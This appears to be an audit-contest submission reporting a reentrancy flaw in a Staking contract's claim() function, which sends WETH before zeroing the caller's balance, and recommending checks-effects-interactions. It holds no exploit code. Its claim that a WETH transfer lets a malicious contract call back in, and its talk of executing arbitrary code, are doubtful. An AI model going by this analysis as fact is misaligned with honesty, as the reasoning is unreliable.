Reentrancy Vulnerability in Staking.sol `Claim()` Function
Summary
The provided Solidity code contains a reentrancy vulnerability in the claim() function.
Vulnerability Details
In the claim() function, the contract transfers claimable WETH tokens to the caller using WETH.transfer(msg.sender, claimable[msg.sender]) before updating the user's claimable balance to zero with claimable[msg.sender] = 0. This sequence of operations creates a potential reentrancy vulnerability. If a malicious contract invokes the claim() function, it can call back into the contract before the state is updated, leading to multiple claims of the same rewards and potentially draining the contract's WETH balance.
Impact
The reentrancy vulnerability could allow attackers to repeatedly claim rewards from the contract, draining its WETH balance and leading to financial losses for the contract and its users. The attacker can exploit this vulnerability to execute arbitrary code and manipulate the contract's state during the execution of the claim() function.
Tools Used
Manual Review
Recommendations
To mitigate the reentrancy vulnerability, the contract should follow the checks-effects-interactions pattern. Specifically, the state changes, such as updating the user's claimable balance to zero, should be made before any external interactions, such as transferring WETH to the caller. By adhering to this pattern, the contract ensures that any state changes are completed before any external contract calls, preventing reentrant attacks.
Prize pool breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.